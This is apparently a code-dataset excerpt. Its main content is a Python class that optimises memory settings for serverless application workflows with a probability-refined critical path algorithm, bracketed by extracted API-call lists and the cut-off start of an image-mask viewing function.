get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2915, 2957), 'lib.data_utils.get_s5p_data', 'get_s5p_data', (["(indir / 'sentinel5P')", 'outdir'], {}), "(indir / 'sentinel5P', outdir)\n", (2927, 2957), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2986, 3019), 'lib.data_utils.get_elevation_data', 'get_elevation_data', (['indir', 'outdir'], {}), '(indir, outdir)\n', (3004, 3019), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((3084, 3121), 'lib.data_utils.get_sen3_data', 'get_sen3_data', (["(indir / 'SEN3')", 'outdir'], {}), "(indir / 'SEN3', outdir)\n", (3097, 3121), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2396, 2411), 'os.listdir', 'os.listdir', (['dir'], {}), '(dir)\n', (2406, 2411), False, 'import os\n')] |
import itertools
import warnings
import networkx as nx
import numpy as np
import pandas as pd
from tqdm import tqdm
from AppGenerator import AppGenerator
from ServerlessAppWorkflow import ServerlessAppWorkflow
warnings.filterwarnings("ignore")
class PerfOpt:
def __init__(self, Appworkflow, generate_perf_profile=True, mem_list=None):
self.App = Appworkflow
self.appgenerator = AppGenerator(seed=16, type='4PL')
if mem_list is None:
self.mem_list = [128, 192, 256, 320, 384, 448, 512, 576, 640, 704, 768, 832, 896, 960, 1024, 1088, 1152,
1216,
1280, 1344, 1408, 1472, 1536, 1600, 1664, 1728, 1792, 1856, 1920, 1984, 2048, 2112, 2176,
2240,
2304, 2368, 2432, 2496, 2560, 2624, 2688, 2752, 2816, 2880, 2944, 3008]
else:
self.mem_list = mem_list
if generate_perf_profile:
self.generate_perf_profile()
self.minimal_mem_configuration, self.maximal_mem_configuration, self.maximal_cost, self.minimal_avg_rt, self.minimal_cost, self.maximal_avg_rt = self.get_optimization_boundary()
self.update_BCR()
self.all_simple_paths = [path for path in
nx.all_simple_paths(self.App.deloopedG, self.App.startPoint, self.App.endPoint)]
self.simple_paths_num = len(self.all_simple_paths)
self.CPcounter = 0
# Generate performance curve for each node in the workflow
def generate_perf_profile(self):
node_list = [item for item in self.App.workflowG.nodes]
node_list.remove('Start')
node_list.remove('End')
nx.set_node_attributes(self.App.workflowG, {}, 'perf_profile')
for node in node_list:
self.App.workflowG.nodes[node]['perf_profile'] = self.appgenerator.gen_rt_mem_data(node)
# Update mem and rt attributes of each node in the workflow
def update_mem_rt(self, G, mem_dict):
for node in mem_dict:
G.nodes[node]['mem'] = mem_dict[node]
G.nodes[node]['rt'] = G.nodes[node]['perf_profile'][mem_dict[node]]
# Update mem and rt attributes of each node in the workflow
def update_App_workflow_mem_rt(self, App, mem_dict):
self.update_mem_rt(App.workflowG, mem_dict)
App.updateRT()
def get_perf_cost_table(self, file, start_iterations=1, end_iterations=None):
'''
Enumerate all possible combinations of memory. For each combination, calculate the end-to-end response time and average cost.
Save the results into a csv.
Args:
file (string): the name of the output csv to be saved
start_iterations (int): the start iterations e.g. 1 == start from the first iteration, 2 == start from the second iteration
end_iterations (int): the end iterations e.g. 10 == end after finishing the 10th iteration
'''
data = pd.DataFrame()
self.App.update_NE()
node_list = [item for item in self.App.workflowG.nodes]
node_list.remove('Start')
node_list.remove('End')
all_available_mem_list = []
for node in node_list:
all_available_mem_list.append(
[item for item in np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))])
if (end_iterations != None):
task_size = end_iterations - start_iterations + 1
else:
task_size = np.prod([len(item) for item in all_available_mem_list]) - start_iterations + 1
mem_configurations = itertools.product(*all_available_mem_list)
for i in range(start_iterations - 1):
next(mem_configurations)
iterations_count = start_iterations - 1
print('Get Performance Cost Table - Task Size: {}'.format(task_size))
if (end_iterations != None):
with tqdm(total=task_size) as pbar:
for mem_config in mem_configurations:
iterations_count += 1
current_mem_config = dict(zip(node_list, mem_config))
self.update_App_workflow_mem_rt(self.App, current_mem_config)
current_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
current_rt = self.App.get_avg_rt()
aRow = current_mem_config
aRow['Cost'] = current_cost
aRow['RT'] = current_rt
aRow = pd.Series(aRow).rename(iterations_count)
data = data.append(aRow)
pbar.update()
if (iterations_count >= end_iterations):
break
else:
with tqdm(total=task_size) as pbar:
for mem_config in mem_configurations:
iterations_count += 1
current_mem_config = dict(zip(node_list, mem_config))
self.update_App_workflow_mem_rt(self.App, current_mem_config)
current_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
current_rt = self.App.get_avg_rt()
aRow = current_mem_config
aRow['Cost'] = current_cost
aRow['RT'] = current_rt
aRow = pd.Series(aRow).rename(iterations_count)
data = data.append(aRow)
pbar.update()
data.to_csv(file, index=True)
def get_optimization_boundary(self):
node_list = [item for item in self.App.workflowG.nodes]
minimal_mem_configuration = {node: min(self.App.workflowG.nodes[node]['perf_profile'].keys()) for node in
node_list}
maximal_mem_configuration = {node: max(self.App.workflowG.nodes[node]['perf_profile'].keys()) for node in
node_list}
self.App.update_NE()
self.update_App_workflow_mem_rt(self.App, maximal_mem_configuration)
maximal_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
minimal_avg_rt = self.App.get_avg_rt()
self.update_App_workflow_mem_rt(self.App, minimal_mem_configuration)
minimal_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
maximal_avg_rt = self.App.get_avg_rt()
return (minimal_mem_configuration, maximal_mem_configuration, maximal_cost, minimal_avg_rt, minimal_cost,
maximal_avg_rt)
# Get the Benefit Cost Ratio (absolute value) of each function
def update_BCR(self):
node_list = [item for item in self.App.workflowG.nodes]
for node in node_list:
available_mem_list = [item for item in np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
available_rt_list = [self.App.workflowG.nodes[node]['perf_profile'][item] for item in available_mem_list]
slope, intercept = np.linalg.lstsq(np.vstack([available_mem_list, np.ones(len(available_mem_list))]).T,
np.array(available_rt_list), rcond=None)[0]
self.App.workflowG.nodes[node]['BCR'] = np.abs(slope)
# Find the probability refined critical path in self.App
def find_PRCP(self, order=0, leastCritical=False):
self.CPcounter += 1
tp_list = self.App.getTP(self.App.deloopedG, self.all_simple_paths)
rt_list = self.App.sumRT_with_NE(self.all_simple_paths, includeStartNode=True, includeEndNode=True)
prrt_list = np.multiply(tp_list, rt_list)
if (leastCritical):
PRCP = np.argsort(prrt_list)[order]
else:
PRCP = np.argsort(prrt_list)[-1 - order]
return (self.all_simple_paths[PRCP])
# Update the list of available memory configurations in ascending order
def update_available_mem_list(self, BCR=False, BCRthreshold=0.1, BCRinverse=False):
node_list = [item for item in self.App.workflowG.nodes]
for node in node_list:
if (BCR):
available_mem_list = [item for item in
np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
mem_zip = [item for item in zip(available_mem_list, available_mem_list[1:])]
if (BCRinverse):
available_mem_list = [item for item in mem_zip if np.abs((item[1] - item[0]) / (
self.App.workflowG.nodes[node]['perf_profile'][item[1]] -
self.App.workflowG.nodes[node]['perf_profile'][item[0]])) > 1.0 / (
self.App.workflowG.nodes[node]['BCR']) * BCRthreshold]
else:
available_mem_list = [item for item in mem_zip if np.abs((self.App.workflowG.nodes[node][
'perf_profile'][item[1]] -
self.App.workflowG.nodes[node][
'perf_profile'][item[0]]) / (
item[1] - item[0])) >
self.App.workflowG.nodes[node]['BCR'] * BCRthreshold]
available_mem_list = list(np.sort(list(set(itertools.chain(*available_mem_list)))))
else:
available_mem_list = [item for item in
np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
self.App.workflowG.nodes[node]['available_mem'] = available_mem_list # Sorted list
def PRCPG_BPBC(self, budget, BCR=False, BCRtype="RT/M", BCRthreshold=0.1):
'''
Probability Refined Critical Path Algorithm - Minimal end-to-end response time under a budget constraint
Best Performance under budget constraint
Args:
budget (float): the budge constraint
BCR (bool): True - use benefit-cost ratio optimization False - not use BCR optimization
BCRtype (string): 'RT/M' - Benefit is RT, Cost is Mem. Eliminate mem configurations which do not conform to BCR limitations.
The greedy strategy is to select the config with maximal RT reduction.
'ERT/C' - Benefit is the reduction on end-to-end response time, Cost is increased cost.
The greedy strategy is to select the config with maximal RT reduction.
'MAX' - Benefit is the reduction on end-to-end response time, Cost is increased cost.
The greedy strategy is to select the config with maximal BCR
BCRthreshold (float): The threshold of BCR cut off
'''
if BCRtype == 'rt-mem':
BCRtype = 'RT/M'
elif BCRtype == 'e2ert-cost':
BCRtype = 'ERT/C'
elif BCRtype == 'max':
BCRtype = 'MAX'
if (BCR and BCRtype == "RT/M"):
self.update_available_mem_list(BCR=True, BCRthreshold=BCRthreshold, BCRinverse=False)
else:
self.update_available_mem_list(BCR=False)
if (BCR):
cost = self.minimal_cost
cost = self.minimal_cost
surplus = budget - cost
self.update_App_workflow_mem_rt(self.App, self.minimal_mem_configuration)
current_avg_rt = self.maximal_avg_rt
current_cost = self.minimal_cost
last_e2ert_cost_BCR = 0
order = 0
iterations_count = 0
while (round(surplus, 4) >= 0):
iterations_count += 1
cp = self.find_PRCP(order=order, leastCritical=False)
max_avg_rt_reduction_of_each_node = {}
mem_backup = nx.get_node_attributes(self.App.workflowG, 'mem')
for node in cp:
avg_rt_reduction_of_each_mem_config = {}
for mem in reversed(self.App.workflowG.nodes[node]['available_mem']):
if (mem <= mem_backup[node]):
break
self.update_App_workflow_mem_rt(self.App, {node: mem})
increased_cost = self.App.get_avg_cost() - current_cost
if (increased_cost < surplus):
self.App.get_simple_dag()
rt_reduction = current_avg_rt - self.App.get_avg_rt()
if (rt_reduction > 0):
avg_rt_reduction_of_each_mem_config[mem] = (rt_reduction, increased_cost)
self.update_App_workflow_mem_rt(self.App, {node: mem_backup[node]})
if (BCR and BCRtype == "ERT/C"):
avg_rt_reduction_of_each_mem_config = {item: avg_rt_reduction_of_each_mem_config[item] for item in
avg_rt_reduction_of_each_mem_config.keys() if
avg_rt_reduction_of_each_mem_config[item][0] /
avg_rt_reduction_of_each_mem_config[item][
1] > last_e2ert_cost_BCR * BCRthreshold}
if (BCR and BCRtype == "MAX"):
avg_rt_reduction_of_each_mem_config = {item: (
avg_rt_reduction_of_each_mem_config[item][0], avg_rt_reduction_of_each_mem_config[item][1],
avg_rt_reduction_of_each_mem_config[item][0] / avg_rt_reduction_of_each_mem_config[item][1]) for
item in avg_rt_reduction_of_each_mem_config.keys()}
if (len(avg_rt_reduction_of_each_mem_config) != 0):
if (BCR and BCRtype == "MAX"):
max_BCR = np.max([item[2] for item in avg_rt_reduction_of_each_mem_config.values()])
max_rt_reduction_under_MAX_BCR = np.max(
[item[0] for item in avg_rt_reduction_of_each_mem_config.values() if
item[2] == max_BCR])
min_increased_cost_under_MAX_rt_reduction_MAX_BCR = np.min(
[item[1] for item in avg_rt_reduction_of_each_mem_config.values() if
item[0] == max_rt_reduction_under_MAX_BCR and item[2] == max_BCR])
reversed_dict = dict(zip(avg_rt_reduction_of_each_mem_config.values(),
avg_rt_reduction_of_each_mem_config.keys()))
max_avg_rt_reduction_of_each_node[node] = (reversed_dict[(
max_rt_reduction_under_MAX_BCR, min_increased_cost_under_MAX_rt_reduction_MAX_BCR,
max_BCR)],
max_rt_reduction_under_MAX_BCR,
min_increased_cost_under_MAX_rt_reduction_MAX_BCR,
max_BCR)
else:
max_rt_reduction = np.max([item[0] for item in avg_rt_reduction_of_each_mem_config.values()])
min_increased_cost_under_MAX_rt_reduction = np.min(
[item[1] for item in avg_rt_reduction_of_each_mem_config.values() if
item[0] == max_rt_reduction])
reversed_dict = dict(zip(avg_rt_reduction_of_each_mem_config.values(),
avg_rt_reduction_of_each_mem_config.keys()))
max_avg_rt_reduction_of_each_node[node] = (
reversed_dict[(max_rt_reduction, min_increased_cost_under_MAX_rt_reduction)],
max_rt_reduction,
min_increased_cost_under_MAX_rt_reduction)
if (len(max_avg_rt_reduction_of_each_node) == 0):
if (order >= self.simple_paths_num - 1):
break
else:
order += 1
continue
if (BCR and BCRtype == "MAX"):
max_BCR = np.max([item[3] for item in max_avg_rt_reduction_of_each_node.values()])
max_rt_reduction_under_MAX_BCR = np.max(
[item[1] for item in max_avg_rt_reduction_of_each_node.values() if item[3] == max_BCR])
target_node = [key for key in max_avg_rt_reduction_of_each_node if
max_avg_rt_reduction_of_each_node[key][3] == max_BCR and
max_avg_rt_reduction_of_each_node[key][1] == max_rt_reduction_under_MAX_BCR][0]
target_mem = max_avg_rt_reduction_of_each_node[target_node][0]
else:
max_rt_reduction = np.max([item[1] for item in max_avg_rt_reduction_of_each_node.values()])
min_increased_cost_under_MAX_rt_reduction = np.min(
[item[2] for item in max_avg_rt_reduction_of_each_node.values() if item[1] == max_rt_reduction])
target_mem = np.min([item[0] for item in max_avg_rt_reduction_of_each_node.values() if
item[1] == max_rt_reduction and item[
2] == min_increased_cost_under_MAX_rt_reduction])
target_node = [key for key in max_avg_rt_reduction_of_each_node if
max_avg_rt_reduction_of_each_node[key] == (
target_mem, max_rt_reduction, min_increased_cost_under_MAX_rt_reduction)][0]
self.update_App_workflow_mem_rt(self.App, {target_node: target_mem})
max_rt_reduction = max_avg_rt_reduction_of_each_node[target_node][1]
min_increased_cost_under_MAX_rt_reduction = max_avg_rt_reduction_of_each_node[target_node][2]
current_avg_rt = current_avg_rt - max_rt_reduction
surplus = surplus - min_increased_cost_under_MAX_rt_reduction
current_cost = self.App.get_avg_cost()
current_e2ert_cost_BCR = max_rt_reduction / min_increased_cost_under_MAX_rt_reduction
if (current_e2ert_cost_BCR == float('Inf')):
last_e2ert_cost_BCR = 0
else:
last_e2ert_cost_BCR = current_e2ert_cost_BCR
current_mem_configuration = nx.get_node_attributes(self.App.workflowG, 'mem')
del current_mem_configuration['Start']
del current_mem_configuration['End']
print('Optimized Memory Configuration: {}'.format(current_mem_configuration))
print('Average end-to-end response time: {}'.format(current_avg_rt))
print('Average Cost: {}'.format(current_cost))
print('PRCP_BPBC Optimization Completed.')
return (current_avg_rt, current_cost, current_mem_configuration, iterations_count)
def PRCPG_BCPC(self, rt_constraint, BCR=False, BCRtype="M/RT", BCRthreshold=0.1):
'''
Probability Refined Critical Path Algorithm - Minimal cost under an end-to-end response time constraint
Best cost under performance (end-to-end response time) constraint
Args:
rt_constraint (float): End-to-end response time constraint
BCR (bool): True - use benefit-cost ratio optimization False - not use BCR optimization
BCRtype (string): 'M/RT' - Benefit is Mem, Cost is RT. (inverse) Eliminate mem configurations which do not conform to BCR limitations
'C/ERT' - Benefit is the cost reduction, Cost is increased ERT.
'MAX' - Benefit is the cost reduction, Cost is increased ERT. The greedy strategy is to select the config with maximal BCR
BCRthreshold (float): The threshold of BCR cut off
'''
if BCRtype == 'rt-mem':
BCRtype = 'M/RT'
elif BCRtype == 'e2ert-cost':
BCRtype = 'C/ERT'
elif BCRtype == 'max':
BCRtype = 'MAX'
if (BCR and BCRtype == "M/RT"):
self.update_available_mem_list(BCR=True, BCRthreshold=BCRthreshold, BCRinverse=True)
else:
self.update_available_mem_list(BCR=False)
self.update_App_workflow_mem_rt(self.App, self.maximal_mem_configuration)
current_avg_rt = self.minimal_avg_rt
performance_surplus = rt_constraint - current_avg_rt
current_cost = self.maximal_cost
last_e2ert_cost_BCR = 0
order = 0
iterations_count = 0
while (round(performance_surplus, 4) >= 0):
iterations_count += 1
cp = self.find_PRCP(leastCritical=True, order=order)
max_cost_reduction_of_each_node = {}
mem_backup = nx.get_node_attributes(self.App.workflowG, 'mem')
for node in cp:
cost_reduction_of_each_mem_config = {}
for mem in self.App.workflowG.nodes[node][
'available_mem']:
if (mem >= mem_backup[node]):
break
self.update_App_workflow_mem_rt(self.App, {node: mem})
self.App.get_simple_dag()
temp_avg_rt = self.App.get_avg_rt()
increased_rt = temp_avg_rt - current_avg_rt
cost_reduction = current_cost - self.App.get_avg_cost()
if (increased_rt < performance_surplus and cost_reduction > 0):
cost_reduction_of_each_mem_config[mem] = (cost_reduction, increased_rt)
self.update_App_workflow_mem_rt(self.App, {node: mem_backup[node]})
if (BCR and BCRtype == 'C/ERT'):
cost_reduction_of_each_mem_config = {item: cost_reduction_of_each_mem_config[item] for item in
cost_reduction_of_each_mem_config.keys() if
cost_reduction_of_each_mem_config[item][0] /
cost_reduction_of_each_mem_config[item][
1] > last_e2ert_cost_BCR * BCRthreshold}
elif (BCR and BCRtype == "MAX"):
cost_reduction_of_each_mem_config = {item: (
cost_reduction_of_each_mem_config[item][0], cost_reduction_of_each_mem_config[item][1],
cost_reduction_of_each_mem_config[item][0] / cost_reduction_of_each_mem_config[item][1]) for
item in
cost_reduction_of_each_mem_config.keys()}
if (len(cost_reduction_of_each_mem_config) != 0):
if (BCR and BCRtype == "MAX"):
max_BCR = np.max([item[2] for item in cost_reduction_of_each_mem_config.values()])
max_cost_reduction_under_MAX_BCR = np.max(
[item[0] for item in cost_reduction_of_each_mem_config.values() if
item[2] == max_BCR])
min_increased_rt_under_MAX_rt_reduction_MAX_BCR = np.min(
[item[1] for item in cost_reduction_of_each_mem_config.values() if
item[0] == max_cost_reduction_under_MAX_BCR and item[2] == max_BCR])
reversed_dict = dict(zip(cost_reduction_of_each_mem_config.values(),
cost_reduction_of_each_mem_config.keys()))
max_cost_reduction_of_each_node[node] = (reversed_dict[(
max_cost_reduction_under_MAX_BCR, min_increased_rt_under_MAX_rt_reduction_MAX_BCR,
max_BCR)],
max_cost_reduction_under_MAX_BCR,
min_increased_rt_under_MAX_rt_reduction_MAX_BCR,
max_BCR)
else:
max_cost_reduction = np.max([item[0] for item in cost_reduction_of_each_mem_config.values()])
min_increased_rt_under_MAX_cost_reduction = np.min(
[item[1] for item in cost_reduction_of_each_mem_config.values() if
item[0] == max_cost_reduction])
reversed_dict = dict(
zip(cost_reduction_of_each_mem_config.values(), cost_reduction_of_each_mem_config.keys()))
max_cost_reduction_of_each_node[node] = (
reversed_dict[(max_cost_reduction, min_increased_rt_under_MAX_cost_reduction)],
max_cost_reduction,
min_increased_rt_under_MAX_cost_reduction)
if (len(max_cost_reduction_of_each_node) == 0):
if (order >= self.simple_paths_num - 1):
break
else:
order += 1
continue
if (BCR and BCRtype == "MAX"):
max_BCR = np.max([item[3] for item in max_cost_reduction_of_each_node.values()])
max_cost_reduction_under_MAX_BCR = np.max(
[item[1] for item in max_cost_reduction_of_each_node.values() if item[3] == max_BCR])
target_node = [key for key in max_cost_reduction_of_each_node if
max_cost_reduction_of_each_node[key][3] == max_BCR and
max_cost_reduction_of_each_node[key][1] == max_cost_reduction_under_MAX_BCR][0]
target_mem = max_cost_reduction_of_each_node[target_node][0]
else:
max_cost_reduction = np.max([item[1] for item in max_cost_reduction_of_each_node.values()])
min_increased_rt_under_MAX_cost_reduction = np.min(
[item[2] for item in max_cost_reduction_of_each_node.values() if item[1] == max_cost_reduction])
target_mem = np.min([item[0] for item in max_cost_reduction_of_each_node.values() if
item[1] == max_cost_reduction and item[
2] == min_increased_rt_under_MAX_cost_reduction])
target_node = [key for key in max_cost_reduction_of_each_node if
max_cost_reduction_of_each_node[key] == (
target_mem, max_cost_reduction, min_increased_rt_under_MAX_cost_reduction)][0]
self.update_App_workflow_mem_rt(self.App, {target_node: target_mem})
max_cost_reduction = max_cost_reduction_of_each_node[target_node][1]
min_increased_rt_under_MAX_cost_reduction = max_cost_reduction_of_each_node[target_node][2]
current_cost = current_cost - max_cost_reduction
performance_surplus = performance_surplus - min_increased_rt_under_MAX_cost_reduction
current_avg_rt = current_avg_rt + min_increased_rt_under_MAX_cost_reduction
current_e2ert_cost_BCR = max_cost_reduction / min_increased_rt_under_MAX_cost_reduction
if (current_e2ert_cost_BCR == float('Inf')):
last_e2ert_cost_BCR = 0
else:
last_e2ert_cost_BCR = current_e2ert_cost_BCR
current_mem_configuration = nx.get_node_attributes(self.App.workflowG, 'mem')
del current_mem_configuration['Start']
del current_mem_configuration['End']
print('Optimized Memory Configuration: {}'.format(current_mem_configuration))
print('Average end-to-end response time: {}'.format(current_avg_rt))
print('Average Cost: {}'.format(current_cost))
print('PRCPG_BCPC Optimization Completed.')
return (current_avg_rt, current_cost, current_mem_configuration, iterations_count)
def get_opt_curve(self, filenameprefix, budget_list, performance_constraint_list, BCRthreshold=0.2):
'''
Get the Optimization Curve and save as csv
Args:
nop_cost (int): the number of evenly spaced budgets in the range of Cost
nop_rt (int): the number of evenly spaced performance constraints in the range of RT
'''
BPBC_data = pd.DataFrame()
for budget in budget_list:
aRow = {'Budget': budget, 'BCR_threshold': BCRthreshold}
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=False)
aRow['BCR_disabled_RT'] = rt
aRow['BCR_disabled_Cost'] = cost
aRow['BCR_disabled_Config'] = config
aRow['BCR_disabled_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='RT/M',
BCRthreshold=BCRthreshold)
aRow['BCR_RT/M_RT'] = rt
aRow['BCR_RT/M_Cost'] = cost
aRow['BCR_RT/M_Config'] = config
aRow['BCR_RT/M_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='ERT/C',
BCRthreshold=BCRthreshold)
aRow['BCR_ERT/C_RT'] = rt
aRow['BCR_ERT/C_Cost'] = cost
aRow['BCR_ERT/C_Config'] = config
aRow['BCR_ERT/C_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='MAX')
aRow['BCR_MAX_RT'] = rt
aRow['BCR_MAX_Cost'] = cost
aRow['BCR_MAX_Config'] = config
aRow['BCR_MAX_Iterations'] = iterations
aRow = pd.Series(aRow)
BPBC_data = BPBC_data.append(aRow, ignore_index=True)
BPBC_data = BPBC_data[
['Budget', 'BCR_disabled_RT', 'BCR_RT/M_RT', 'BCR_ERT/C_RT', 'BCR_MAX_RT', 'BCR_disabled_Cost',
'BCR_RT/M_Cost', 'BCR_ERT/C_Cost', 'BCR_MAX_Cost', 'BCR_disabled_Config', 'BCR_RT/M_Config',
'BCR_ERT/C_Config', 'BCR_MAX_Config', 'BCR_disabled_Iterations', 'BCR_RT/M_Iterations',
'BCR_ERT/C_Iterations', 'BCR_MAX_Iterations', 'BCR_threshold']]
BPBC_data.to_csv(filenameprefix + '_BPBC.csv', index=False)
BCPC_data = pd.DataFrame()
for perf_constraint in performance_constraint_list:
aRow = {'Performance_Constraint': perf_constraint, 'BCR_threshold': BCRthreshold}
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=False)
aRow['BCR_disabled_RT'] = rt
aRow['BCR_disabled_Cost'] = cost
aRow['BCR_disabled_Config'] = config
aRow['BCR_disabled_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True, BCRtype='RT/M',
BCRthreshold=BCRthreshold)
aRow['BCR_M/RT_RT'] = rt
aRow['BCR_M/RT_Cost'] = cost
aRow['BCR_M/RT_Config'] = config
aRow['BCR_M/RT_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True,
BCRtype='ERT/C', BCRthreshold=BCRthreshold)
aRow['BCR_C/ERT_RT'] = rt
aRow['BCR_C/ERT_Cost'] = cost
aRow['BCR_C/ERT_Config'] = config
aRow['BCR_C/ERT_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True, BCRtype='MAX')
aRow['BCR_MAX_RT'] = rt
aRow['BCR_MAX_Cost'] = cost
aRow['BCR_MAX_Config'] = config
aRow['BCR_MAX_Iterations'] = iterations
aRow = pd.Series(aRow)
BCPC_data = BCPC_data.append(aRow, ignore_index=True)
BCPC_data = BCPC_data[
['Performance_Constraint', 'BCR_disabled_RT', 'BCR_M/RT_RT', 'BCR_C/ERT_RT', 'BCR_MAX_RT',
'BCR_disabled_Cost',
'BCR_M/RT_Cost', 'BCR_C/ERT_Cost', 'BCR_MAX_Cost', 'BCR_disabled_Config', 'BCR_M/RT_Config',
'BCR_C/ERT_Config', 'BCR_MAX_Config', 'BCR_disabled_Iterations', 'BCR_M/RT_Iterations',
'BCR_C/ERT_Iterations', 'BCR_MAX_Iterations', 'BCR_threshold']]
BCPC_data.to_csv(filenameprefix + '_BCPC.csv', index=False)
| [
"pandas.DataFrame",
"tqdm.tqdm",
"numpy.multiply",
"numpy.abs",
"networkx.set_node_attributes",
"warnings.filterwarnings",
"networkx.get_node_attributes",
"numpy.argsort",
"numpy.array",
"pandas.Series",
"networkx.all_simple_paths",
"itertools.product",
"AppGenerator.AppGenerator",
"iterto... | [((211, 244), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (234, 244), False, 'import warnings\n'), ((401, 434), 'AppGenerator.AppGenerator', 'AppGenerator', ([], {'seed': '(16)', 'type': '"""4PL"""'}), "(seed=16, type='4PL')\n", (413, 434), False, 'from AppGenerator import AppGenerator\n'), ((1698, 1760), 'networkx.set_node_attributes', 'nx.set_node_attributes', (['self.App.workflowG', '{}', '"""perf_profile"""'], {}), "(self.App.workflowG, {}, 'perf_profile')\n", (1720, 1760), True, 'import networkx as nx\n'), ((2969, 2983), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2981, 2983), True, 'import pandas as pd\n'), ((3603, 3645), 'itertools.product', 'itertools.product', (['*all_available_mem_list'], {}), '(*all_available_mem_list)\n', (3620, 3645), False, 'import itertools\n'), ((7590, 7619), 'numpy.multiply', 'np.multiply', (['tp_list', 'rt_list'], {}), '(tp_list, rt_list)\n', (7601, 7619), True, 'import numpy as np\n'), ((18651, 18700), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (18673, 18700), True, 'import networkx as nx\n'), ((27723, 27772), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (27745, 27772), True, 'import networkx as nx\n'), ((28623, 28637), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (28635, 28637), True, 'import pandas as pd\n'), ((30624, 30638), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (30636, 30638), True, 'import pandas as pd\n'), ((7227, 7240), 'numpy.abs', 'np.abs', (['slope'], {}), '(slope)\n', (7233, 7240), True, 'import numpy as np\n'), ((11975, 12024), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (11997, 12024), True, 'import networkx as nx\n'), ((21018, 21067), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (21040, 21067), True, 'import networkx as nx\n'), ((30010, 30025), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (30019, 30025), True, 'import pandas as pd\n'), ((32153, 32168), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (32162, 32168), True, 'import pandas as pd\n'), ((1292, 1371), 'networkx.all_simple_paths', 'nx.all_simple_paths', (['self.App.deloopedG', 'self.App.startPoint', 'self.App.endPoint'], {}), '(self.App.deloopedG, self.App.startPoint, self.App.endPoint)\n', (1311, 1371), True, 'import networkx as nx\n'), ((3909, 3930), 'tqdm.tqdm', 'tqdm', ([], {'total': 'task_size'}), '(total=task_size)\n', (3913, 3930), False, 'from tqdm import tqdm\n'), ((4759, 4780), 'tqdm.tqdm', 'tqdm', ([], {'total': 'task_size'}), '(total=task_size)\n', (4763, 4780), False, 'from tqdm import tqdm\n'), ((7667, 7688), 'numpy.argsort', 'np.argsort', (['prrt_list'], {}), '(prrt_list)\n', (7677, 7688), True, 'import numpy as np\n'), ((7729, 7750), 'numpy.argsort', 'np.argsort', (['prrt_list'], {}), '(prrt_list)\n', (7739, 7750), True, 'import numpy as np\n'), ((7131, 7158), 'numpy.array', 'np.array', (['available_rt_list'], {}), '(available_rt_list)\n', (7139, 7158), True, 'import numpy as np\n'), ((4517, 4532), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (4526, 4532), True, 'import pandas as pd\n'), ((5367, 5382), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (5376, 5382), True, 'import pandas as pd\n'), ((8449, 8599), 'numpy.abs', 'np.abs', (["((item[1] - item[0]) / (self.App.workflowG.nodes[node]['perf_profile'][item\n [1]] - self.App.workflowG.nodes[node]['perf_profile'][item[0]]))"], {}), "((item[1] - item[0]) / (self.App.workflowG.nodes[node]['perf_profile'\n ][item[1]] - self.App.workflowG.nodes[node]['perf_profile'][item[0]]))\n", (8455, 8599), True, 'import numpy as np\n'), ((8855, 9005), 'numpy.abs', 'np.abs', (["((self.App.workflowG.nodes[node]['perf_profile'][item[1]] - self.App.\n workflowG.nodes[node]['perf_profile'][item[0]]) / (item[1] - item[0]))"], {}), "((self.App.workflowG.nodes[node]['perf_profile'][item[1]] - self.App.\n workflowG.nodes[node]['perf_profile'][item[0]]) / (item[1] - item[0]))\n", (8861, 9005), True, 'import numpy as np\n'), ((9488, 9524), 'itertools.chain', 'itertools.chain', (['*available_mem_list'], {}), '(*available_mem_list)\n', (9503, 9524), False, 'import itertools\n')] |
import cv2
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
def view_img_mask(img, mask, thres_val, model=False):
if model:
pred = model.predict(np.expand_dims(img, axis=0)).reshape((1, img.shape[0], img.shape[1], 1))
pred = np.squeeze(pred)
